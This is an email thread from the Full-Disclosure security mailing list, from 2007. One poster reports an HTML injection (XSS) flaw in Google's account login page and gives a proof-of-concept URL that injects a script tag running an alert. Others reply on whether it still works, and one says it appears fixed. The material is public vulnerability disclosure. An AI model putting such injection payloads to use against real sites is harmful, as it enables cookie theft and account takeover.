<div>wow ! 0day !</div>
<div>damn, right now 0day are fucking XSS ...<br><br> </div>
<div><span class="gmail_quote">On 11/8/07, <b class="gmail_sendername">silky</b> <<a href="mailto:michaelslists@gmail.com">michaelslists@gmail.com</a>> wrote:</span>
<blockquote class="gmail_quote" style="PADDING-LEFT: 1ex; MARGIN: 0px 0px 0px 0.8ex; BORDER-LEFT: #ccc 1px solid">worked for me minutes after it was posted. seems fixed now.<br><br>On 11/9/07, crazy frog crazy frog <<a href="mailto:i.m.crazy.frog@gmail.com">
i.m.crazy.frog@gmail.com</a>> wrote:<br>> i tested it on gmail latest version,itsnot working for me?<br>><br>> On Nov 8, 2007 7:04 AM, Scripter Hack <<a href="mailto:xss2root@gmail.com">xss2root@gmail.com</a>
> wrote:<br>> > There is a html injection vulnerability in <a href="https://www.google.com">https://www.google.com</a>.<br>> > It is very critical,you can get the cookie to login into gmail ore other<br>> > service.
<br>> ><br>> > POC:<br>> > <a href="https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#">
https://www.google.com/accounts/ServiceLogin?service=mail&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dl&ltmpl=default&ltmplcache=2&passive=truel#</a>"></script><script>alert('xss')</script>&1-=1
<br>> ><br>> > More:<a href="http://xss2root.blogspot.com/">http://xss2root.blogspot.com/</a><br>> > _______________________________________________<br>> > Full-Disclosure - We believe in it.<br>> > Charter:
<a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>> > Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a>
<br>> ><br>><br>><br>><br>> --<br>> advertise on secgeeks?<br>> <a href="http://secgeeks.com/Advertising_on_Secgeeks.com">http://secgeeks.com/Advertising_on_Secgeeks.com</a><br>> <a href="http://newskicks.com">
http://newskicks.com</a><br>><br>> _______________________________________________<br>> Full-Disclosure - We believe in it.<br>> Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html
</a><br>> Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br>><br><br><br>--<br>mike<br><a href="http://lets.coozi.com.au/">http://lets.coozi.com.au/</a><br><br>_______________________________________________
<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">
http://secunia.com/</a><br></blockquote></div><br>